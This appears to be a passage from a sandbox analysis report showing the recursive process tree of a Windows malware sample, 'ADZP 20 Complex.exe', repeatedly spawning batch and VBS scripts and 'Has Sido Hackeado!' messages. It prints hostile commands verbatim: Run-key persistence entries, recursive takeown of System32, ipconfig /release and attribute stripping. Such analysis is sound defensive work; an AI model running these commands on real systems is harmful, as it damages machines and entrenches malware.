        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        19⤵
        
        PID:8656
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        19⤵
        Gathers network information
        
        PID:9008
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        19⤵
        Kills process with taskkill
        
        PID:8868
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        19⤵
        Views/modifies file attributes
        
        PID:9024
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        19⤵
        
        PID:8672
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        19⤵
        
        PID:9008
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        19⤵
        
        PID:8868
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        19⤵
        
        PID:9000
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        19⤵
        
        PID:6092
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        19⤵
        
        PID:9252
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        19⤵
        
        PID:9268
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        19⤵
        
        PID:9308
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        19⤵
        
        PID:9340
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        19⤵
        
        PID:9368
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        19⤵
        
        PID:9380
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        19⤵
        
        PID:9412
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        19⤵
        
        PID:9428
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        19⤵
        
        PID:9456
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E0CA.tmp\E0CB.tmp\E0CC.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        20⤵
        
        PID:9596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        21⤵
        
        PID:9996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        21⤵
        
        PID:10004
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        21⤵
        
        PID:10188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        21⤵
        
        PID:10216
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        22⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:9444
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        21⤵
        
        PID:9396
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        21⤵
        
        PID:9428
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        21⤵
        Gathers network information
        
        PID:9452
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        21⤵
        Kills process with taskkill
        
        PID:9588
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        21⤵
        Views/modifies file attributes
        
        PID:9612
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        21⤵
        
        PID:9904
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        21⤵
        
        PID:9924
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        21⤵
        
        PID:9936
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        21⤵
        
        PID:9956
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        21⤵
        
        PID:4704
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        21⤵
        
        PID:10032
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        21⤵
        
        PID:4756
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        21⤵
        
        PID:10096
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        21⤵
        
        PID:10120
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        21⤵
        
        PID:9764
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        21⤵
        
        PID:9752
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        21⤵
        
        PID:9688
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        21⤵
        
        PID:9652
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        21⤵
        
        PID:9552
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FCDE.tmp\FCDF.tmp\FCE0.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        22⤵
        
        PID:3748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        23⤵
        
        PID:6356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        23⤵
        
        PID:6408
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        23⤵
        
        PID:10296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        23⤵
        
        PID:10308
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        24⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:10440
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        23⤵
        
        PID:10332
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        23⤵
        
        PID:10408
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        23⤵
        Gathers network information
        
        PID:10424
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        23⤵
        Kills process with taskkill
        
        PID:10456
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        23⤵
        Views/modifies file attributes
        
        PID:10488
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        23⤵
        
        PID:10564
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        23⤵
        
        PID:10580
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        23⤵
        
        PID:10588
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        23⤵
        
        PID:10640
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        23⤵
        
        PID:10684
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        23⤵
        
        PID:10712
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        23⤵
        
        PID:10732
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        23⤵
        
        PID:10776
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        23⤵
        
        PID:10792
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        23⤵
        
        PID:10848
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        23⤵
        
        PID:10876
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        23⤵
        
        PID:10904
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        23⤵
        
        PID:10920
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        23⤵
        
        PID:10936
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1AB6.tmp\1AB7.tmp\1AB8.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        24⤵
        
        PID:11100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        25⤵
        
        PID:10488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        25⤵
        
        PID:10504
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        25⤵
        
        PID:11140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        25⤵
        
        PID:11012
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        26⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2116
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        25⤵
        
        PID:5028
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        25⤵
        
        PID:4396
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        25⤵
        Gathers network information
        
        PID:3616
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        25⤵
        Kills process with taskkill
        
        PID:3556
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        25⤵
        Views/modifies file attributes
        
        PID:10952
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        25⤵
        
        PID:3096
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        25⤵
        
        PID:1512
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        25⤵
        
        PID:7232
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        25⤵
        
        PID:8184
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        25⤵
        
        PID:10408
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        25⤵
        
        PID:8332
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        25⤵
        
        PID:10496
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        25⤵
        
        PID:9680
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        25⤵
        
        PID:1840
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        25⤵
        
        PID:5180
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        25⤵
        
        PID:11220
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        25⤵
        
        PID:11132
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        25⤵
        
        PID:332
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        25⤵
        
        PID:592
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3F36.tmp\3F37.tmp\3F38.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        26⤵
        
        PID:5884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        27⤵
        
        PID:5456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        27⤵
        
        PID:5488
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        27⤵
        
        PID:5772
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        27⤵
        
        PID:8708
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        28⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5296
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        27⤵
        
        PID:5296
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        27⤵
        
        PID:5792
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        27⤵
        Gathers network information
        
        PID:5616
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        27⤵
        Kills process with taskkill
        
        PID:5792
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        27⤵
        Views/modifies file attributes
        
        PID:5736
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        27⤵
        
        PID:11132
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        27⤵
        
        PID:3624
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        27⤵
        
        PID:5368
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        27⤵
        
        PID:5792
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        27⤵
        
        PID:5736
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        27⤵
        
        PID:11300
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        27⤵
        
        PID:11324
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        27⤵
        
        PID:11348
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        27⤵
        
        PID:11416
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        27⤵
        
        PID:11460
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        27⤵
        
        PID:11496
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        27⤵
        
        PID:11512
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        27⤵
        
        PID:11528
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        27⤵
        
        PID:11544
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\54C2.tmp\54C3.tmp\54C4.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        28⤵
        
        PID:11720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        29⤵
        
        PID:11988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        29⤵
        
        PID:12024
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        29⤵
        
        PID:12168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        29⤵
        
        PID:12188
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        30⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5308
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        29⤵
        
        PID:12220
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        29⤵
        
        PID:12268
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        29⤵
        Gathers network information
        
        PID:12284
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        29⤵
        Kills process with taskkill
        
        PID:11512
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        29⤵
        Views/modifies file attributes
        
        PID:11660
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        29⤵
        
        PID:11736
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        29⤵
        
        PID:11624
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        29⤵
        
        PID:11812
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        29⤵
        
        PID:11712
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        29⤵
        
        PID:11852
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        29⤵
        
        PID:11888
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        29⤵
        
        PID:6280
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        29⤵
        
        PID:11916
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        29⤵
        
        PID:11972
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        29⤵
        
        PID:12040
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        29⤵
        
        PID:12076
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        29⤵
        
        PID:12116
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        29⤵
        
        PID:7784
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        29⤵
        
        PID:11868
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\72AA.tmp\72AB.tmp\72AC.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        30⤵
        
        PID:11716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        31⤵
        
        PID:11748
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        32⤵
        
        PID:6560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        31⤵
        
        PID:11528
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        31⤵
        
        PID:7816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        31⤵
        
        PID:7876
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        32⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:12284
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        31⤵
        
        PID:8012
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        31⤵
        
        PID:10680
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        31⤵
        Gathers network information
        
        PID:7216
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        31⤵
        Kills process with taskkill
        
        PID:12268
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        31⤵
        Views/modifies file attributes
        
        PID:7148
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        31⤵
        
        PID:8012
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        31⤵
        
        PID:6740
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        31⤵
        
        PID:10232
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        31⤵
        
        PID:10448
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        31⤵
        
        PID:6556
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        31⤵
        
        PID:12200
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        31⤵
        
        PID:7744
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        31⤵
        
        PID:12312
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        31⤵
        
        PID:12336
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        31⤵
        
        PID:12376
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        31⤵
        
        PID:12392
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        31⤵
        
        PID:12420
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        31⤵
        
        PID:12444
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        31⤵
        
        PID:12460
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\914E.tmp\914F.tmp\9150.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        32⤵
        
        PID:12588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        33⤵
        
        PID:12884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        33⤵
        
        PID:12920
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        33⤵
        
        PID:13024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        33⤵
        
        PID:13044
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        34⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:13144
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        33⤵
        
        PID:13104
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        33⤵
        
        PID:13128
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        33⤵
        Gathers network information
        
        PID:13168
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        33⤵
        Kills process with taskkill
        
        PID:13200
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        33⤵
        Views/modifies file attributes
        
        PID:13240
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        33⤵
        
        PID:13252
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        33⤵
        
        PID:13272
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        33⤵
        
        PID:13296
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        33⤵
        
        PID:7208
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        33⤵
        
        PID:12432
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        33⤵
        
        PID:12452
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        33⤵
        
        PID:12584
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        33⤵
        
        PID:12616
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        33⤵
        
        PID:12700
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        33⤵
        
        PID:12624
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        33⤵
        
        PID:12544
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        33⤵
        
        PID:7764
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        33⤵
        
        PID:12796
        
